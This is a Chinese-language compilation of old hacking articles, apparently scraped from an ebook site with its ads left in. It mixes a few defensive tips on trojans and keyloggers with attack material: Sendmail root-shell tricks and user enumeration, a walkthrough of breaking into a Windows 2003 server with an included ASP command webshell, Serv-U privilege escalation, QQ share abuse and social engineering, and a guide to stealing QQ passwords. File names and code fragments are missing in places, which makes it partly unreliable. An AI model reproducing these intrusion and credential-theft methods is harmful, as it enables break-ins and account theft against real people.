UNIX类系统一般采用Sendmail作为邮件系统,在获得了系统的控制权之后,用John等软件就能从/etc/passwd或者/etc/shadow中破解出密码。如果采用了数据库方式来保存用户信息和密码,也是很容易被导出。
二、利用邮件服务器软件本身的漏洞
最常见的邮件服务器程序有Sendmail,Qmail等,在不同程度在都存在安全缺陷。以Sendmail为例,再以前的老版本中,telnet到25端口,输入wiz,然后接着输入shell,就能获得一个rootshell,还有debug命令,也能获得root权限。Qmail相对Sendmail安全,但是Qpoper存在Buffer Overflow缺陷,能够远程得到rootshell,进而控制系统。
即使邮件服务器是安全的,但是入侵者还能获得更多的信息,比如用户名。telnet到25端口,输入expn tom或者vrfy tom就能查询系统是否有tom用户。最新版本的Sendmail虽然禁用了这两个命令,但是可以通过伪造发信人然后用rcpt to来判断该用户是否存在。
得到了用户名,可以telnet到110端口,尝试简单密码的连接,或者套用字典破解。
所以,必须禁止非本域的中继利用(relay),或者采用现在很多ISP都采用的给SMTP加上发信认证的模块,这样能够增强邮件服务器的安全。
除了POP3方式收信之外,比较流行的是在WEB界面上处理邮件。这种方式也不无弱点,一般是通过CGI来接受用户传递的表单FORM参数,包括username和password,如果正确,就可以进入处理邮件的页面。破解已知用户的密码,有很多套用字典或者暴力组合的软件可用,比较著名的是小榕的《溯雪》,在密码简单的情况下,很快就有结果。
WEB邮件系统都有“忘记密码”的选项,如果能破解寄回密码的另外一个邮箱或者猜出提示问题的答案,也能成功。
三、在邮件的传输过程中窃听
在网络中安装Sniffer,指定监听往外部服务器110端口发送的数据包,从收集下来的信息中查看user和pass后的字符串就能看到用户名和相应的密码。书包 网 想看书来
网吧如何来防御网游外挂木马全攻略
目前,很多人发布各种所谓的外挂程序或者不明网站的链接,奉劝各位,千万不要点击。因为那很有可能会捆绑一个“键盘纪录器”。
为了您账号的安全,请您留心一下这些隐藏在诱惑中的“黑手”。
防范方法
1、请将IE的"INTERNET选项"的"高级"设置为"恢复默认设置"。
2、不要安装和下载一些来历不明的软件,特别是一些所谓的外挂程序。
3、不要随便打开来历不明信件的附件。
4、安装最新杀毒软件,并定时升级病毒库。
5、小心网吧的计算机上安装有记录键盘操作的软件,或被安装了木马。使用网吧计算机时,需先按ctrl,alt,del三个键,看看是否有来历不明的程序正在运行,如果有,则立即将该程序结束任务。
6、网吧上网的用户,最好先扫描一下机器看是否有木马程序。
针对于一些暴力破解密码的软件,破解用户的帐号密码
这种方法主要是通过使用一些暴力破解密码的软件,用穷举法逐个的尝试用户的帐号密码,但需要使用者有一定的电脑知识,而且破解需要很长时间。
防范方法
1、尽量避免将游戏帐号暴露在公众论坛和其他网站。
2、用户在设置密码时,尽量设置的复杂一点,最好设置为8位数以上的字母、数字和其他符号的组合。
3、不要使用可轻易获得的关于您的信息作为密码。这包括生日、身份证号码、手机号码、您所居住的街道的名字等等。
4、经常更换密码,因为8位数以上的字母、数字和其他符号的组合也不是无懈可击的。
5、申请密码保护,也就是设置安全码,安全码不要和密码设置的一样。如果您没有设置安全码,那么别人一旦破解您的密码,就可以把您的密码和注册资料(除证件号码外)全部修改。
木马防御全攻略
您的计算机是否已被装了木马?如何检测?
1)检查注册表看HKEY_LOCAL_MACHINE/SOFTWARE/MicrosoftWindows/
Curren Version 和HKEY_CURRENT_USER/Software/MicrosoftWindows/
CurrentVersion下,所有以"Run"开头的键值名,其下有没有可疑的文件名。如果有,就需要删除相应的键值,再删除相应的应用程序。
2)检查启动组木马们如果隐藏在启动组虽然不是十分隐蔽,但这里的确是自动加载运行的好场所,因此还是有木马喜欢在这里驻留的。启动组对应的文件夹为:C:windowsstart menuprogramsstartup,在注册表中的位置:HKEY_CURRENT_USER/Software/
MicrosoftWindows/Current Version/ExplorerShell
Folders Startup="C:windowsstart
menuprogramsstartup"。要注意经常检查这两个地方哦!
3)以及也是木马们喜欢的隐蔽场所,要注意这些地方。比方说,的[Windows]小节下的load和run后面在正常情况下是没有跟什么程序的,如果有了那就要小心了,看看是什么;在的[boot]小节的Shell=后面也是加载木马的好场所,因此也要注意这里了。当你看到变成这样:Shell=,请注意那个很有可能就是木马服务端程序!赶快检查吧。
4)检查C:、C:、。木马们也很可能隐藏在那里。
5)如果是EXE文件启动,那么运行这个程序,看木马是否被装入内存,端口是否打开。如果是,则说明要么是该文件启动木马程序,要么是该文件捆绑了木马程序,只好再找一个这样的程序,重新安装一下了。
6)木马启动都有一个方式,它只是在一个特定的情况下启动,所以,平时多注意一下你的端口,查看一下正在运行的程序,用此来监测大部分木马应该没问题的。
利用QQ文件共享漏洞入侵 Windows2003
服务器上运行的第三方软件历来就被攻击者们看作是入侵目标系统的捷径。现在,著名的腾讯qq又被列入了这些捷径名单,好在qq并不是服务器必备的软件之一,所以相信不会造成大范围的危机。文中遇到特殊情况虽然不多,但大家还是应该遵照“可能的就应该防范”的原则做出相应防御。
一、在windows2003中得到的webshell
此次渗透的目标是一台oa办公系统服务器。其操作系统新近升级到了windows2003,但oa仍存在asp文件上传漏洞,所以webshell的取得并没有任何悬念。阻碍是在权限提升时遇到的。
登陆webshell后发现只能查看服务器的d盘,对c盘不能进行任何访问,webshell的提示是“没有权限”。这点早在意料之中,因为wenshell只有guests组权限,再加上win2003默认禁止了“everyone"匿名用户及“guest"组权限用户访问,还造成了不能通过webshell运行。
唯一值得庆幸的是利用webshell 可以对d盘(存放有web虚拟目录)各个子目录进行读写。这里除了web虚拟目录还有一些数据备份文件和一个腾讯qq安装目录tencent。
二、破解serv-u的终极防范
windows2003的种种默认安全配置展示了它强大的一面,近一步提升现有权限似乎已不太可能,直到我试图从系统入手向这台服务器发出ftp链接请求并看到serv-u的banner时才觉得又有了一线希望。
前面提到由于windows2003对的权限限制,通过webshell方式不能运行,这样的论断在2004年6期的防线的《构建windows2003堡垒主机》一文也曾提到,但实践表明这并不正确,通过webshell上传本地非2003系统中未受限制的文件到可执行目录,再通过wscript组件,同样能够通过webshell方式在windows2003下获得相应权限的。结合,甚至还能得到一个guest组权限的命令行下的shell。
为此,我对老兵的站长助手做了一些改进,增加了如下代码,使其能够利用组件运行本地上传的。
function cmdshell()
if request("sp")<>"" then session("shellpath") = request("sp")
shellpath=session("shellpath")
if shellpath="" then shellpath = ""
if request("wscript")="yes" then
checked=" checked"
else
checked=""
end if
if request("cmd")<>"" then defcmd = request("cmd")
si="<form method='post'><input name='cmd' style='width:92%' class='cmd'
value='"defcmd&"'><input type='submit' value='运行'>"
si=si&"<textarea style='width:100%;height:500;' class='cmd'>"
if ("cmd")<>"" then
if ("wscript")="yes" then
set cm=createobject(obt(1,0))
set dd=(shellpath&" /c "defcmd)
aaa=
si=si&aaa
else%>
<object runat=server id=ws scope=page classid="clsid:72c24dd5-d70a-438b-8a42-
98424b88afb8"></object>
<object runat=server id=ws scope=page classid="clsid:f935dc22-1cf0-11d0-adb9-
00c04fd58a0b"></object>
<object runat=server id=fso scope=page classid="clsid:0d43fe01-f093-11cf-8940-
00a0c9054228"></object>
<%sztempfile = (";)
call (shellpath&" /c " & defcmd & " > " & sztempfile, 0, true)
set fs = createobject(";)
set ofilelcx = (sztempfile, 1, false, 0)
aaa=()
call (sztempfile, true)
si=si&aaa
end if
end if
si=si&chr(13)&"</textarea>"
si=si&"shell路径:<input name='sp' value='"&shellpath&"' style='width:70%'> "
si=si&"<input type='checkbox' name='wscript' value='yes'"&checked&"></form>"
end function
利用时只需在shell路径中指定上传的路径,再选中选项wscript就能运行一些所需权限较低的系统命令,如“net start”或者“netstat -an”,依次运行这两个命令后webshell回显了众多服务,包括serv-u ftp server。
活动端口列表中又出现了43958端口,于是我自然想到了神通广大的serv-u ftp server本地权限提升漏洞。可真正用到的ftp本地权限提升工具在执行系统命令时,却出现了530错误提示。看来管理员或者其他人对serv-u打上了布丁或者做了某些安全配置。
为了知道究竟是怎样的安全配置,上网查了查相关文章,其中有一篇《serv-u ftp server 本地权限提升漏洞的终极防范》很受欢迎,被多方转载,作者是世外高人xiaolu。从错误提示看很有可能做了该文所谓的终极防范,即对中默认的管理员或密码进行了修改。
当然这只是假设,只有将目标服务器上的下载下来看看具体配置才能确定,但是安装有serv-u的c盘禁止访问,包括programe files 目录,权限提升再次受阻。
三、利用qq2005共享文件漏洞将权限提升到底
再次翻了翻d盘,又见到了那个很少能在服务器中看到的tencent文件夹。查看。
得知qq的版本是qq2005 beta1,几个于相关文件的创建时间也说明网管最近在服务器上登陆过qq。难道只能用qq?经过一番思索,终于想到一个可以利用的qq2005在文件共享功能上的一则漏洞。
该漏洞是随着qq2005贺岁版新增功能出现的。可以将其危害描述为:利用该漏洞,攻击者可以浏览,读取用户系统中的任意文件(如sam文件、数据备份文件、敏感信息文件)。影响系统:安装有qq2005贺岁版以上的所有windows系列操作系统。
具体利用方法是:先在本机登陆自己的qq,调出“qq菜单”,选择工具->设置共享,指定c:\或者其他任何有利用价值的分区为共享文件,完成后关闭qq,找到安装目录下的以qq帐号命名的文件夹内“”文件。上传覆盖目标服务器上相同文件(如:d:\tencent\qq\654321\)。这样,当网管在服务器上登陆qq时就会向好友开放c盘为共享目录。
因为陌生人是不能共享对方文件,所以还需要用社会工程学申请将管理员加为好友(理由当然越可信越好)。如果管理员通过请求,服务器的c盘会以qq共享文件目录的名义被共享,原本不能通过webshell访问的文件就能被下载,遇到阻碍的权限提升之路又能继续了。
当晚管理员就通过了申请,将我添加为好友。珊瑚虫qq上显示的ip正是目标服务器的ip,于是下载了文件,用ue打开后查找,发现默认配置下的内置帐户“localadministrator”果然被改成了“localadministruser”。
这看起来是一个很“终极”的防御,但提出该方法的xiaolu似乎没有进行攻防所须的换位思考就将其公布,要知道攻击者只需知道修改后的配置,并对本地权限提升利用工具进行相应的修改,所谓的终极防御也就被攻破了。方法还是用ue打开脱了壳的serv-u本地权限提升利用工具,将localadministrator改为localadministruser即可。
然后上传修改后的,在中执行d:\web\ “net user user password /add”后看看结果,已经成功添加了一个用户。再把该用户加入administrators组和“remote desktop users”组后登陆了目标服务器的远程桌面。
经过重重险阻,终于彻底攻陷了这台坚固的windows2003堡垒。
四、简单启示
可以看出,和“服务越少越安全”一样,服务器上运行的“第三方”越少越安全,流行的pcanywhere、vnc、serv-u 权限提升和这里提出的利用qq2005提升权限,都是可以这样避免。
盗QQ的几种方法!
这些日子没写教程真是对不起大家。为此我这次教大家怎么盗QQ来弥补我的过失!教程以后仍会继续写的,大家继续关注吧!
“远程破解”与前面的“本地破解”正好相反,是指QQ盗号者通过网络盗窃远端QQ用户的密码。这种QQ破解有很多方法,如在线密码破解、登录窗口破解、邮箱破解、消息诈骗以及形形色色的QQ木马病毒等。下面就让我们一同来看看这些QQ密码的远程破解是怎么实现的。
1、在线密码破解
大家知道QQ可以利用代理服务器登录,这是一种保护措施。它不仅可以隐藏用户的真实IP地址,以避免遭受网络攻击,还可以加快登录速度,保证登录的稳定性。
在线密码破解和本地密码破解采用的技术方法类似,都是穷举法,只不过前者完全脱离了本地用户使用的QQ。它通过对登录代理服务器进行扫描,只要想盗的QQ号码在线,就可利用在线盗号工具实现远程TCP/IP的追捕,从而神不知鬼不觉地盗取QQ密码!
在线破解改变了本地破解那种被动的破解方式,只要是在线的QQ号码都可以破解,适用范围较广。但是由于它仍然采用穷举法技术,所以在枚举密钥位数长度以及类型时,校验时间很长,破解效率不高。同样,这种方法还受到电脑速度、网速等诸多因素的影响,因此比前面的本地破解更麻烦。
目前功能比较强大的一款QQ密码在线破解软件叫QQExplorer。它的破解操作分四步:第一步,在QQ起始号码和结束号码中填上想要盗取的QQ号码(此号码必须在线);第二步,在“添加或删除HTTP代理服务器”中输入代理服务器的IP地址和端口号码(如果你嫌自己寻找QQ代理服务器麻烦,可以使用一些现代的QQ代理公布软件);第三步,点击“添加&测试”按钮,软件先自动检测此服务器是否正常,确定后将它加入代理服务器列表(此软件可填入多个代理服务器的地址,并且能够自动筛选不可用或者速度慢的服务器);第四步,点击“开始”按钮,开始在线密码破解……
2、登录窗口破解
伪造QQ登录窗口的盗号方法非常简单,这是一种比较另类的木马破解方法(后面对木马破解有专门讲述)。先用盗号软件生成一个伪装的QQ主程序,它运行后会出现跟腾讯QQ一模一样的登录窗口,只要用户在这个伪登录窗口中登录,输入的QQ号及密码就会被记录下来,并通过电子邮件发送到盗号者指定的油箱中,在此以一款叫“狐Q”的软件为例,首次运行它时,它会把自身复制到QQ目录中,并把原来的文件改名为(这样的更改不会影响QQ的正常运行)。设置完毕后,“狐Q”的原程序就会消失,伪装成QQ等待“猎物”上钩……在其软件设置中,有一项设置可以决定真假QQ交替运行的次数,可以减少用户在使用QQ时产生的怀疑。比如说将“生效次数”设定为3,那么用户第一次运行的是真QQ了,也就是说在第三次运行时,用户的QQ号便被盗了!在QQ密码发送的过程中,如果发送失败,它还会把QQ号和密码记下来,等待下一次发送。
一秒记住www点dier22点com,最新小说等你来